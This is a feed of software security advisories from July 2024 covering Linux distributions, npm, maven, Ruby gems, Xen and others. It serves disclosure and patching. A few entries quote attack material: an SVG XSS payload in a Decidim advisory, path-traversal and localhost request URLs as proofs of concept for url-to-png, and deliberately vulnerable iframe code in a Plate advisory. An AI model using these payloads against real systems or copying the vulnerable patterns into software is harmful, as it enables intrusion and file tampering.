10.07.2024 23:23:31	npm	[NPM:GHSA-43WQ-XRCM-3VGR] @discordjs/opus vulnerable to Denial of Service (high)	All versions of the package @discordjs/opus are vulnerable to Denial of Service (DoS) due to providing an input object with a property toString to several different functions. Exploiting this vulnerability could lead to a system crash.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-43WQ-XRCM-3VGR
10.07.2024 09:07:01	ubuntu	[USN-6889-1] .NET vulnerabilities (high)	Several security issues were fixed in dotnet6, dotnet8.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6889-1
10.07.2024 08:51:27	ubuntu	[USN-6890-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6890-1
10.07.2024 03:00:00	debian	[DSA-5727-1] firefox-esr	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5727-1
10.07.2024 03:00:00	debian	[DSA-5728-1] exim4 (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5728-1
10.07.2024 03:00:00	gentoo	[GLSA-202407-25] Buildah: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Buildah, the worst of which could lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-25
10.07.2024 03:00:00	gentoo	[GLSA-202407-24] HarfBuzz: Denial of Service (normal)	A vulnerability has been discovered in HarfBuzz, which can lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-24
10.07.2024 03:00:00	oraclelinux	[ELSA-2024-4450] dotnet8.0 security update (important)	[8.0.107-1.0.1]- Add support for Oracle Linux[8.0.107-1]- Update to .NET SDK 8.0.107 and Runtime 8.0.7- Resolves: RHEL-45324	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4450
10.07.2024 03:00:00	oraclelinux	[ELSA-2024-4451] dotnet8.0 security update (important)	[8.0.107-1.0.1]- Add support for Oracle Linux[8.0.107-1]- Update to .NET SDK 8.0.107 and Runtime 8.0.7- Resolves: RHEL-45322	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4451
10.07.2024 03:00:00	oraclelinux	[ELSA-2024-4457] openssh security update (moderate)	[8.7p1-38.0.2.4]- Possible remote code execution due to a race condition (CVE-2024-6409) Resolves: RHEL-45741	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4457
10.07.2024 03:00:00	redhat	[RHSA-2024:4451] dotnet8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.107 and Runtime 8.0.7.Security Fix(es):* dotnet: DoS in System.Text.Json (CVE-2024-30105)* dotnet: DoS in ASP.NET Core 8 (CVE-2024-35264)* dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4451
10.07.2024 03:00:00	redhat	[RHSA-2024:4450] dotnet8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.107 and Runtime 8.0.7.Security Fix(es):* dotnet: DoS in System.Text.Json (CVE-2024-30105)* dotnet: DoS in ASP.NET Core 8 (CVE-2024-35264)* dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4450
10.07.2024 17:26:30	maven	[MAVEN:GHSA-VFWH-GVF6-MFF8] Silverpeas Core Cross-site Scripting vulnerability (moderate)	In Silverpeas Core <= 6.3.5, inside of mes agendas a user can create a new event and add it to his calendar. The user can also add other users to the event from the same domain, including administrator. A normal user can create an event with XSS payload inside `Titre` and `Description` parameters and add the administrator or any user to the event. When the other user (victim) visits his own profile (even without clicking on the event) the payload will be executed on the victim side.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VFWH-GVF6-MFF8
10.07.2024 16:08:28	almalinux	[ALSA-2024:4422] fence-agents security update (moderate)	fence-agents security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4422
10.07.2024 12:03:22	almalinux	[ALSA-2024:4439] dotnet6.0 security update (moderate)	dotnet6.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4439
12.07.2024 00:29:38	ubuntu	[USN-6864-3] Linux kernel (GKE) vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6864-3
11.07.2024 23:08:16	ubuntu	[USN-6894-1] Apport vulnerabilities (high)	Several security issues were fixed in Apport.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6894-1
11.07.2024 22:01:12	ubuntu	[USN-6893-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6893-1
11.07.2024 20:25:58	ubuntu	[USN-6885-2] Apache HTTP Server regression	USN-6885-1 introduced a regression in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6885-2
11.07.2024 14:54:39	ubuntu	[USN-6891-1] Python vulnerabilities (critical)	Several security issues were fixed in Python.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6891-1
11.07.2024 13:41:49	ubuntu	[USN-6888-2] Django vulnerabilities (medium)	Several security issues were fixed in Django.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6888-2
11.07.2024 03:00:00	debian	[DSA-5729-1] apache2 (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5729-1
11.07.2024 11:44:08	almalinux	[ALSA-2024:4451] dotnet8.0 security update (important)	dotnet8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4451
11.07.2024 11:47:10	almalinux	[ALSA-2024:4450] dotnet8.0 security update (important)	dotnet8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4450
11.07.2024 03:00:00	freebsd	[FREEBSD:ACB4EAB6-3F6D-11EF-8657-001B217B3468] Gitlab -- vulnerabilities (critical)	Gitlab reports: An attacker can run pipeline jobs as an arbitrary user Developer user with admin_compliance_framework permission can change group URL Admin push rules custom role allows creation of project level deploy token Package registry vulnerable to manifest confusion User with admin_group_member permission can ban group members Subdomain takeover in GitLab Pages	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:ACB4EAB6-3F6D-11EF-8657-001B217B3468
11.07.2024 23:22:56	rubysec	[RUBYSEC:DECIDIM-2024-27090] Decidim vulnerable to data disclosure through the embed feature (medium)	### ImpactIf an attacker can infer the slug or URL of an unpublished or privateresource, and this resource can be embedded (such as a ParticipatoryProcess, an Assembly, a Proposal, a Result, etc), then some data ofthis resource could be accessed.### PatchesVersion 0.27.6https://github.com/decidim/decidim/commit/1756fa639ef393ca8e8bb16221cab2e2e7875705### WorkaroundsDisallow access through your web server to the URLs finished with `/embed.html`	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2024-27090
11.07.2024 23:22:56	rubysec	[RUBYSEC:DECIDIM-2024-32469] Decidim cross-site scripting (XSS) in the pagination (high)	### ImpactThe pagination feature used in searches and filters is subject topotential XSS attack through a malformed URL using the GET parameter`per_page`.### PatchesPatched in version 0.27.6 and 0.28.1### ReferencesOWASP ASVS v4.0.3-5.1.3### CreditsThis issue was discovered in a security audit organized by the[mitgestalten Partizipationsbüro](https://partizipationsbuero.at/)and funded by [netidee](https://www.netidee.at/) against Decidimdone during April 2024. The security audit was implemented by[AIT Austrian Institute of Technology GmbH](https://www.ait.ac.at/),	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2024-32469
11.07.2024 23:22:56	rubysec	[RUBYSEC:DECIDIM-ADMIN-2024-27095] Decidim cross-site scripting (XSS) in the admin panel (medium)	### ImpactThe admin panel is subject to potential XSS attach in case the attackermanages to modify some records being uploaded to the server.The attacker is able to change e.g. to `<svg onload=alert('XSS')>`if they know how to craft these requests themselves. And then enterthe returned blob ID to the form inputs manually by modifying theedit page source.### PatchesAvailable in versions 0.27.6 and 0.28.1.### WorkaroundsReview the user accounts that have access to the admin panel (i.e.general Administrators, and participatory space's Administrators)and remove access to them if they don't need it.### ReferencesOWASP ASVS v4.0.3-5.1.3	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-ADMIN-2024-27095
12.07.2024 19:34:08	go	[GO-2024-2980] NATS Server and Streaming Server fails to enforce negative user permissions, mayallow denied subjects in github.com/nats-io/nats-server		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2980
12.07.2024 19:34:08	go	[GO-2024-2981] SQL Injection in the KubeClarity REST API in github.com/openclarity/kubeclarity/backend (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2981
12.07.2024 19:34:08	go	[GO-2024-2982] Hashicorp Vault vulnerable to Improper Check or Handling of ExceptionalConditions in github.com/hashicorp/vault (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2982
13.07.2024 00:00:44	maven	[MAVEN:GHSA-HHWC-GH8H-9RRP] Apache Wicket: Remote code execution via XSLT injection (high)	The default configuration of XSLTResourceStream.java is vulnerable to remote code execution via XSLT injection when processing input from an untrusted source without validation.Users are recommended to upgrade to versions 10.1.0, 9.18.0 or 8.16.0, which fix this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HHWC-GH8H-9RRP
12.07.2024 17:12:19	ubuntu	[USN-6896-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-1
12.07.2024 13:02:16	ubuntu	[USN-6895-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-1
12.07.2024 03:00:00	oraclelinux	[ELSA-2024-4502] skopeo security update (important)	[2:1.14.3-3]- golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4502
13.07.2024 03:00:00	freebsd	[FREEBSD:55D4A92F-C75F-43E8-AB1F-4A0EFC9795C4] electron29 -- multiple vulnerabilities (high)	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-6291. Security: backported fix for CVE-2024-6293. Security: backported fix for CVE-2024-6290. Security: backported fix for CVE-2024-6292.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:55D4A92F-C75F-43E8-AB1F-4A0EFC9795C4
13.07.2024 03:00:00	freebsd	[FREEBSD:6410F91D-1214-4F92-B7E0-852E39E265F9] electron30 -- multiple vulnerabilities (high)	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-5493. Security: backported fix for CVE-2024-5831. Security: backported fix for CVE-2024-5832. Security: backported fix for CVE-2024-6100. Security: backported fix for CVE-2024-6101. Security: backported fix for CVE-2024-6103. Security: backported fix for CVE-2024-6291. Security: backported fix for CVE-2024-6293. Security: backported fix for CVE-2024-6290. Security: backported fix for CVE-2024-6292.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:6410F91D-1214-4F92-B7E0-852E39E265F9
16.07.2024 00:38:11	npm	[NPM:GHSA-H3PQ-667X-R789] Plate media plugins has a XSS in media embed element when using custom URL parsers (high)	### ImpactEditors that use `MediaEmbedElement` and pass custom `urlParsers` to the `useMediaState` hook may be vulnerable to XSS if a custom parser allows `javascript:`, `data:` or `vbscript:` URLs to be embedded. Editors that do not use `urlParsers` and instead consume the `url` property directly may also be vulnerable if the URL is not sanitised.The default parsers `parseTwitterUrl` and `parseVideoUrl` are not affected.Examples of vulnerable code:```tsxconst { embed } = useMediaState({ urlParsers: [ // Custom parser that does not use an allowlist or validate the URL protocol (url) => ({ url }), ],});return ( <iframe src={embed!.url} // ... />);``````tsxconst { url } = useMediaState();return ( <iframe // url property used directly from useMediaState() with no sanitisation src={url} // ... />);``````tsxconst { url } = element;return ( <iframe // url property used directly from element with no sanitisation src={url} // ... />);```### Patches`@udecode/plate-media` 36.0.10 resolves this issue by only allowing HTTP and HTTPS URLs during parsing. This affects only the `embed` property returned from `useMediaState`.In addition, the `url` property returned from `useMediaState` has been renamed to `unsafeUrl` to indicate that it has not been sanitised. The `url` property on `element` is also unsafe, but has not been renamed. If you're using either of these properties directly, you will still need to validate the URL yourself.### WorkaroundsEnsure that any custom `urlParsers` do not allow `javascript:`, `data:` or `vbscript:` URLs to be returned in the `url` property of their return values.If `url` is consumed directly, validate the URL protocol before passing it to the `iframe` element.### ReferencesHow to verify the protocol of a URL: https://stackoverflow.com/a/43467144	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-H3PQ-667X-R789
16.07.2024 00:38:46	npm	[NPM:GHSA-342Q-2MC2-5GMP] @jmondi/url-to-png enables capture screenshot of localhost web services (unauthenticated pages) (low)	### SummaryThe maintainer been contemplating whether FTP or other protocols could serve as useful functionalities, but there may not be a practical reason for it since we are utilizing headless Chrome to capture screenshots. The argument is based on the assumption that this package can function as a service.The package includes an `ALLOW_LIST` where the host can specify which services the user is permitted to capture screenshots of. By default, capturing screenshots of web services running on localhost, 127.0.0.1, or the [::] is allowed.The maintainer is of the opinion that the package should also have a blacklist due to a potential vulnerability (or rather design oversight). If someone hosts this on a server, users could then capture screenshots of other web services running locally.Unless this is strictly for web pages. Something similar here: https://github.com/follow-redirects/follow-redirects/issues/235 (localhost is intended for end users or hosts to deny, and the package is for HTTP/HTTPS.)This is marked as a `LOW` since the maintainer is not sure if this is a vulnerability, but it's still best to highlight it. 🙂 ### PoCHave a service like so running locally:```jsconst http = require("http")const server = http.createServer((req, res) => { console.log("Received headers:", req.headers) res.writeHead(200, { "Content-Type": "text/plain" }) res.end("Something private! But Hello from Server 2 :)")})server.listen(3001, () => { console.log("Server two running on http://localhost:3001")})```Run the package in dev mode, `pnpm dev`. Feed these URLs:```http://localhost:3089/?url=http://[::]:3001&width=4000http://localhost:3089/?url=http://localhost:3001&width=4000http://localhost:3089/?url=http://127.0.01:3001&width=4000```<img width="622" alt="image" src="https://github.com/jasonraimondi/url-to-png/assets/42532003/21f1c883-ba00-4a15-83b8-922484fa4c2b">### ImpactDisclose internal web services?	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-342Q-2MC2-5GMP
16.07.2024 00:38:36	npm	[NPM:GHSA-VVMV-WRVP-9GJR] @jmondi/url-to-png contains a Path Traversal vulnerability (moderate)	### SummaryWhen trying to add a `BLOCK_LIST` feature when the maintainer noticed they didn't sanitize the `ImageId` in the code, which leads to path traversal vulnerability. Now, this is different from a traditional path traversal issue, because as of NOW you can store the image in any place arbitrarily, and given enough time they might be able to come up with a working exploit BUT for the time being they am reporting this. ### Details@jmondi/url-to-png does not sanitizing the `ImageID` as in not removing special chars from the params [(extract_query_params.ts#l75)](https://github.com/jasonraimondi/url-to-png/blob/e43098e0af3a380ebc044e7f303a83933b94b434/src/middlewares/extract_query_params.ts#L75)```jsconst imageId = dateString + "." + slugify(validData.url) +configToString(params);```This when fed to other parts of the code such as ([filesystem.ts#L34](https://github.com/jasonraimondi/url-to-png/blob/8afc00247c1d7e6c7b37356a5f6282b486e596fa/src/lib/storage/filesystem.ts#L34))```jsreturn path.join(this.storagePath, imageId) + ".png";```Would result in path traversal issue. ### PoC```# Configuration for filesystem storage provider (optional)STORAGE_PROVIDER=filesystemIMAGE_STORAGE_PATH=poc```Set this in your `.env` file and use this as your payload. ```http://localhost:3089/?url=http://example.com&width=400&isDarkMode=../../../../../../../../../../../../tmp/hack```This will create a `.png` file in the `/tmp` section of the system.Loom POC: https://www.loom.com/share/bd7b306cdae7445c97e68f0626e743a6 This is valid for pretty much all the arguments (except for numeric values)A simple fix would be to use the `slugify` for the params as well like so ([#L75](https://github.com/jasonraimondi/url-to-png/blob/e43098e0af3a380ebc044e7f303a83933b94b434/src/middlewares/extract_query_params.ts#L75))```diff- const imageId = dateString + "." + slugify(validData.url) + configToString(params);+ const imageId = dateString + "." + slugify(validData.url) + slugify(configToString(params));```### ImpactThis would be path traversal vulnerability which allows arbitrary write as of now.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VVMV-WRVP-9GJR
15.07.2024 19:11:24	ubuntu	[USN-6898-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-1
15.07.2024 15:20:00	rockylinux	[RLSA-2024:4212] golang security update (moderate)	An update is available for golang.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4212
15.07.2024 15:20:00	rockylinux	[RLSA-2024:4500] firefox security update (important)	An update is available for firefox.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4500
15.07.2024 15:20:00	rockylinux	[RLSA-2024:4450] dotnet8.0 security update (important)	An update is available for dotnet8.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4450
15.07.2024 15:20:00	rockylinux	[RLSA-2024:4457] openssh security update (moderate)	An update is available for openssh.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4457
15.07.2024 15:19:59	rockylinux	[RLSA-2024:4349] kernel security and bug fix update (moderate)	An update is available for kernel.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4349
15.07.2024 14:27:33	ubuntu	[USN-6897-1] Ghostscript vulnerabilities (high)	Several security issues were fixed in Ghostscript.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6897-1
15.07.2024 20:40:59	maven	[MAVEN:GHSA-7QPC-4XX9-X5QW] Apache Linkis DataSource's JDBC Datasource Module with DB2 has JNDI Injection vulnerability (high)	In Apache Linkis <=1.5.0, due to the lack of effective filteringof parameters, an attacker configuring malicious `db2` parameters in the DataSource Manager Module will result in jndi injection. Therefore, the parameters in the DB2 URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out.Versions of Apache Linkis <=1.5.0 will be affected. We recommend users upgrade the version of Linkis to version 1.6.0.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7QPC-4XX9-X5QW
15.07.2024 20:36:38	maven	[MAVEN:GHSA-JJVC-V8GW-5255] Apache Linkis DataSource remote code execution vulnerability (high)	In Apache Linkis <= 1.5.0, data source management module, when adding Mysql data source, exists remote code execution vulnerability for java version < 1.8.0_241. The deserialization vulnerability exploited through jrmp can inject malicious files into the server and execute them. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. We recommend that users upgrade the java version to >= 1.8.0_241. Or users upgrade Linkis to version 1.6.0.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JJVC-V8GW-5255
15.07.2024 20:35:54	maven	[MAVEN:GHSA-F22J-9J59-33J4] Apache Linkis DataSource allows arbitrary file reading (moderate)	In Apache Linkis = 1.4.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will trigger arbitrary file reading. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis = 1.4.0 will be affected. We recommend users upgrade the version of Linkis to version 1.6.0.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F22J-9J59-33J4
15.07.2024 03:00:00	cisa	[CISA-2024:0715] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0715
15.07.2024 03:00:00	debian	[DSA-5730-1] linux (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5730-1
15.07.2024 03:00:00	redhat	[RHSA-2024:4502] skopeo security update (important)	The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4502
16.07.2024 16:03:44	ubuntu	[USN-6899-1] GTK vulnerability (high)	GTK could be made to run programs from the current directory.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6899-1
16.07.2024 14:59:00	xen	[XSA-458] double unlock in x86 guest IRQ handling	ISSUE DESCRIPTIONAn optional feature of PCI MSI called "Multiple Message" allows adevice to use multiple consecutive interrupt vectors. Unlike for MSI-X,the setting up of these consecutive vectors needs to happen all in onego. In this handling an error path could be taken in differentsituations, with or without a particular lock held. This error pathwrongly releases the lock even when it is not currently held.IMPACTDenial of Service (DoS) affecting the entire host, crashes, informationleaks, or elevation of privilege all cannot be ruled out.VULNERABLE SYSTEMSXen versions 4.4 and newer are vulnerable. Xen versions 4.3 and olderare not vulnerable.Only x86 guest which have a multi-vector MSI capable device passedthrough to them can leverage the vulnerability.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-458
16.07.2024 14:59:00	xen	[XSA-459] Xapi: Metadata injection attack against backup/restore functionality	ISSUE DESCRIPTIONFor a brief summary of Xapi terminology, see: https://xapi-project.github.io/xen-api/overview.html#object-model-overviewXapi contains functionality to backup and restore metadata about VirtualMachines and Storage Repositories (SRs).The metadata itself is stored in a Virtual Disk Image (VDI) inside anSR. This is used for two purposes; a general backup of metadata(e.g. to recover from a host failure if the filer is still good), andPortable SRs (e.g. using an external hard drive to move VMs to anotherhost).Metadata is only restored as an explicit administrator action, butoccurs in cases where the host has no information about the SR, and mustlocate the metadata VDI in order to retrieve the metadata.The metadata VDI is located by searching (in UUID alphanumeric order)each VDI, mounting it, and seeing if there is a suitable metadata filepresent. The first matching VDI is deemed to be the metadata VDI, andis restored from.In the general case, the content of VDIs are controlled by the VM owner,and should not be trusted by the host administrator.A malicious guest can manipulate its disk to appear to be a metadatabackup.A guest cannot choose the UUIDs of its VDIs, but a guest with one diskhas a 50% chance of sorting ahead of the legitimate metadata backup. Aguest with two disks has a 75% chance, etc.IMPACTIf a fraudulent metadata backup has been written into an SR which alsocontains a legitimate metadata backup, and an administrator explicitlychooses to restore from backup, the fraudulent metadata might beconsumed instead of the legitimate metadata.Control over meta data includes: which VMs are created, disk assignment,vCPU/RAM requirements, GPU allocation, etc.VULNERABLE SYSTEMSSystems running Xapi v1.249.x are affected.Systems running Xapi v24.x are potentially affected. However it isbelieved that the only supported products using this version of Xapihave not shipped the metadata backup/restore functionality.To leverage the vulnerability, an attacker would likely need insiderinformation to construct a plausible-looking metadata backup, and wouldhave to persuade a real administrator to perform a data-recovery action.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-459
16.07.2024 14:47:17	ubuntu	[USN-6896-2] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-2
16.07.2024 13:12:28	ubuntu	[USN-6895-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-2
16.07.2024 12:17:22	ubuntu	[USN-6893-2] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6893-2
16.07.2024 03:00:00	debian	[DSA-5731-1] linux (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5731-1
16.07.2024 03:00:00	freebsd	[FREEBSD:3B018063-4358-11EF-B611-84A93843EB75] MySQL -- Multiple vulnerabilities	Oracle reports: 36 new security patches for Oracle MySQL. 11 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials. The highest CVSS v3.1 Base Score of vulnerabilities affecting Oracle MySQL is 9.8.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3B018063-4358-11EF-B611-84A93843EB75
16.07.2024 19:59:47	rubysec	[RUBYSEC:REXML-2024-39908] DoS in REXML (medium)	There is a DoS vulnerability in REXML gem. This vulnerability hasbeen assigned the CVE identifier CVE-2024-39908. We stronglyrecommend upgrading the REXML gem.## DetailsWhen it parses an XML that has many specific characters such as<, 0 and %>. REXML gem may take long time.Please update REXML gem to version 3.3.2 or later.## Affected versionsREXML gem 3.3.2 or prior## CreditsThanks to mprogrammer for discovering this issue.## HistoryOriginally published at 2024-07-16 03:00:00 (UTC)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-39908
17.07.2024 22:35:44	slackware	[SSA:2024-199-01] openssl (critical)	New openssl packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/openssl-1.1.1za-i586-1_slack15.0.txz: Upgraded. Apply patches to fix CVEs that were fixed by the 1.1.1{x,y,za} releases that were only available to subscribers to OpenSSL's premium extended support. These patches were prepared by backporting commits from the OpenSSL-3.0 repo. The reported version number has been updated so that vulnerability scanners calm down. All of these issues were considered to be of low severity. Thanks to Ken Zalewski for the patches! For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-5678 https://www.cve.org/CVERecord?id=CVE-2024-0727 https://www.cve.org/CVERecord?id=CVE-2024-2511 https://www.cve.org/CVERecord?id=CVE-2024-4741 https://www.cve.org/CVERecord?id=CVE-2024-5535 (* Security fix )patches/packages/openssl-solibs-1.1.1za-i586-1_slack15.0.txz: Upgraded.```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-1.1.1za-i586-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-solibs-1.1.1za-i586-1_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-1.1.1za-x86_64-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-solibs-1.1.1za-x86_64-1_slack15.0.txzUpdated packages for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl11-solibs-1.1.1za-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl11-1.1.1za-i586-1.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl11-solibs-1.1.1za-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl11-1.1.1za-x86_64-1.txzMD5 signaturesSlackware 15.0 packages:17a7499e8c2dd1050edf5727e39fcb8a openssl-1.1.1za-i586-1_slack15.0.txzb3a247626d8822a9bee0890f88bc675c openssl-solibs-1.1.1za-i586-1_slack15.0.txzSlackware x86_64 15.0 packages:745b28ea0b2aa0f47783d26aa68c20df openssl-1.1.1za-x86_64-1_slack15.0.txz1af41bae8d09023bb3ceeb8711a057d8 openssl-solibs-1.1.1za-x86_64-1_slack15.0.txzSlackware -current packages:a074c2d960c70836a6d5cbe27d34bd7c a/openssl11-solibs-1.1.1za-i586-1.txz6ab87d351559e2a1fe859de508c6925a n/openssl11-1.1.1za-i586-1.txzSlackware x86_64 -current packages:7a4ce9d3e3c250d91981f7149d2deb9d a/openssl11-solibs-1.1.1za-x86_64-1.txzcd7509e6d6138daf5480a2936d759b75 n/openssl11-1.1.1za-x86_64-1.txzInstallation instructions*Upgrade the packages as root:`# upgradepkg openssl-1.1.1za-i586-1_slack15.0.txz openssl-solibs-1.1.1za-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-199-01
17.07.2024 19:22:29	ubuntu	[USN-6896-3] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-3
17.07.2024 19:00:00	cisco	[CISCO-SA-WEBEX-APP-ZJNM8X8J] Cisco Webex App Vulnerabilities (medium)	Multiple vulnerabilities in Cisco Webex App could allow an unauthenticated attacker to gain access to sensitive credential information.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. The updates are part of the Cisco Webex service, and no customer action is necessary to get these software updates. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-WEBEX-APP-ZJNM8X8J
